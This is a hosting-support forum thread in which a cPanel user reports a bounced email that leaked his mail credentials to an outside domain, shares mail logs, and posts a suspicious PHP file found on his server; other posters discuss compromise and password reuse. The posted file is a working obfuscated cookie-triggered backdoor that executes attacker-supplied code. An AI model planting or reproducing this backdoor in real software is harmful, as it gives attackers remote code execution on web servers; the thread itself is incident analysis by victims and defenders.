Bounced Email with Password in Plain Text

[jimhermann]

Folks,

I received a bounced email that contained the account email address and password in Plain Text.

Did the Sender hack the account password and send themselves an email with the email address and password?

The original email came from my account: [email protected]
However, the IP Address was in Poland and the To Address was in Russian.

2020-12-16 13:42:01 1kpcgS-0000lp-Si <= [email protected] H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=
TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:[email protected] S=476 T="invoice for NL325
2324" for [email protected]
2020-12-16 13:42:01 1kpcgS-0000lp-Si SMTP connection outbound 1608147721 1kpcgS-0000lp-Si domainname.com info1big
@supportwebarh.info
2020-12-16 13:44:08 1kpcgS-0000lp-Si H=supportwebarh.info [178.132.201.122] Connection timed out

The original email contained:

Return-path: <[email protected]>
Received: from [213.92.204.4] (port=36457 helo=127.0.0.1)
by host3.uuserver.net with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.93)
(envelope-from <[email protected]>)
id 1kpcgS-0000lp-Si
for [email protected]; Wed, 16 Dec 2020 13:42:01 -0600
X-mailer: Apple Mail (2.3273)
Subject: invoice for NL3252324
Date: Wed, 16 Dec 2020 20:42:03 +0100

[email protected]:[email protected]:PASSWORD:mail.domainname.com:465

I did not find any additional activity for IP Address 213.92.204.4 or domain name supportwebarh.info

Thanks,

Jim

 

[cPRex]

Hey there! Sorry to hear about this, and as you suspect, it seems like some type of compromise as cPanel never stores the passwords in plain text anywhere on the system. You'll want to have an admin review the security of the system, change the user and email passwords, and also possibly have any users with access to that cPanel account or email address scan their personal machines to ensure there is no malware present on those systems.

 

[jimhermann]

The compromised email address was never used as a username for other sites.

It appears that the encrypted password was hacked from a commercial site back in 2017. They must have been running a program to decipher the password since then.

They must have connected the email address for [email protected] with [email protected]. The passwords were the same.

I changed all the passwords and found one suspect PHP script: index547c5a.php

<?php
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[4
6])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>

I don't know what this code does.

Any ideas?

Jim

 

[cPRex]

It definitely looks suspicious with the cookie values, and the name "check_it_script" but I'm not a PHP developer so I'm not 100% certain on what that is trying to achieve. It definitely seems like you've found the root of the issue though.

 

[Metro2]

I know this thread is a little old, but I just wanted to comment since this same kind of situation recently occurred with one of my customers (but there were was no local compromise at the server level / no suspicious files / no infected files in the user's hosting account).

Short version - a few bounced emails were actually sent from the user's email address to an address @supportwebarh.info , and of course the user did not send them. I happened to notice the bounces sitting in the mail queue because I check it daily on all servers. I immediately contacted the customer, ran CXS scans on his hosting account (and did a visual / manual examination of his site files) and helped him scan his computers for viruses and malware. His hosting account was clean, no foreign cPanel logins, no direct POP logins from any foreign IP addresses. Only the password that was exposed in plain text from his email account to an address @supportwebarh.info. After making sure everything was secure at server level (changed his email password of course, and cPanel password just in case, ran scans on server and his computers, etc... all clean) the only thing that we could narrow it down to was a very old password that he had used on some other email accounts and sites around the web, and ultimately it appears that was either the result of an old breach at one of the several sites / sources I could see for his email account on haveibeenpwnd , and the fact that he did not have any security running on his mobile devices. While this isn't "ultimate" proof that there wasn't another type of compromise, based on all the procedures I performed with the user it seems very likely that his phone was involved and that it was a password that he should have changed a long time ago on his email account and on a remote mail account from one of the big popular webmail services. (Thankfully he had changed it everywhere else).

I know that wasn't exactly short, but it was the shortest version to add this comment, and to point out that in an almost exact case for one of my customers, the compromise was not at the server or hosting account level at all. It really came down to him using the same password on a few remote / external accounts and not changing it after known breaches at other / big companies, and possibly combined with the fact that he was not keeping his mobile devices secured. So while there isn't "total proof" , it's a pretty solid case that it was due to an old breach of an old password he'd used on a couple of other services, and a solid case that it had nothing at all to do with cPanel nor his hosting account nor his site or the server.

Definitely solid case for what everyone should already be putting in practice - update old passwords (even on accounts/sites "not used in years") and don't use the same password on any two accounts or sites. With all of the password generator / keeper programs available these days, it's really not that hard.